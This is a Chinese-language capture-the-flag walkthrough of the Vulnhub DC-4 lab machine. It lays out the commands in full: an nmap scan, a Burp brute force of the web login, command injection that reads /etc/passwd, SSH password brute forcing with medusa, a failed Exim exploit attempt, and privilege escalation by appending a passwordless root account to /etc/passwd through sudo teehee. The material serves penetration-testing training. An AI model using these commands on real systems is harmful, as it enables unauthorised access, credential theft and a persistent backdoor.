Vulnhub-DC-4

掃描獲取目標 IP 地址:192.168.67.135
nmap -sn 192.168.67.0/24

掃描目標，獲取系統信息和開放端口：80 && 22
nmap -A -p- 192.168.67.135
（初步猜想就是通過 web 獲取到系統用戶密碼，再通過 ssh 登陸最後提權的思路）

登陸 http://192.168.67.135 ：
首先看下 wapplayzer，發現是 Nginx ，但暫時得不到詳細版本，故先記錄，以防備用
頁面上寫着：Admin Information Systems Login，說是以系統用戶登錄
再看看發現 POST 表單,試了下弱口令，不解，故拿出 Burpsuite 看看能否破解密碼
瀏覽器設置好代理，抓請求然後burpsuite調至intruder,
拷貝一份字典到主目錄下，方便 burpsuite 使用字典，在 intruder 下加載 payload ，start attack爆破即可
cp /usr/share/wordlists/nmap.lst /root/

等待一段時間，得到密碼爲 happy [通過 length 不同即可看出密碼]，登陸進去看看
發現一個 command 鏈接，點進去挑選了個 List Files 可看到熟悉的東西：

total 24
-rw-r–r-- 1 root root 1783 Apr 5 2019 command.php
drwxr-xr-x 2 root root 4096 Mar 24 2019 css
drwxr-xr-x 2 root root 4096 Mar 24 2019 images
-rw-r–r-- 1 root root 506 Apr 6 2019 index.php
-rw-r–r-- 1 root root 1473 Apr 7 2019 login.php
-rw-r–r-- 1 root root 663 Mar 24 2019 logout.php

`cat+/etc/passwd` 這不就是 linux 下經常使用的 ls 命令麼...所以，抓下來看看能不能修修改改再發過去？ --- send to repeater 通過修改我們可以 cat /ect/passwd 下有四個賬戶：root / sam / jim / charles 最初的猜想驗證了，很可能就是 ssh 登陸進去... 到各個 /home/ 下看看有沒有特別東西 `ls+la+/home/sam`：沒啥東西 `ls+la+/home/jim`：發現只有一 backups目錄和一 test.sh文件可查 `cat+test.sh`：沒啥特別的，幾行字 `ls+/home/jim/backups`：看看backups目錄下都有啥，發現喲一個oldpassword文件，這...又是要爆破密碼麼...（果然） `cat+/home/jim/backups/old-passwords.bak`：將得到的密碼複製一份到 kali的/root/oldpwd.txt 中 `vim oldpwd.txt`

使用美杜莎爆破，得到密碼 jibril04
medusa -M ssh -u jim -h 192.168.67.135 -P oldpwd.txt

ssh登陸上去：ssh [email protected]
打開剛纔無權限打開的mbox，原來是封郵件，並且得到版本信息：Exim 4.89
所以search一波有沒有可以直接提權的：searchsploit Exim Local Privilege

發現確實有該版本的：Exim 4.87 - 4.91 - Local Privilege Escal | linux/local/46996.sh

於是乎：scp 46996.sh [email protected]:/home/jim/傳過去
bash 46996.sh執行，報錯…
漏洞利用不成功…

到 /var/mail 目錄下看看還有無有其它郵件：cd /var/www
發現一封：

Hi Jim,

I’m heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

哦吼，直接送上密碼
既然是 boss 要給的，那是不是 charles 的權限要大點？
ssh [email protected]
ls

木有發現什麼東西，不過直覺上到這一步應該就是要提權了的。怎麼提？這是個好問題那就看看自己有什麼 sudo 權限：sudo -l

開心的事情是：發現一個具有 sudo 權限的:/usr/bin/teehee，但是並不知道要怎麼使用，查看一下幫助文檔
/usr/bin/teehee --help

原來通過該命令（前提是擁有絕對的權限）可以在任意文件後邊添加內容那爲什麼不僞造另一個 root（到這裏，我彷彿聽到了邪惡的笑聲…）
echo "haha::0:0:root:/root:/bin/bash" | sudo /usr/bin/teehee -a /etc/passwd
su haha
cd /root
ls
cat flag.txt

Congratulations!!!

總結：
1.密碼破解2.漏洞利用3.提權增添虛假root賬號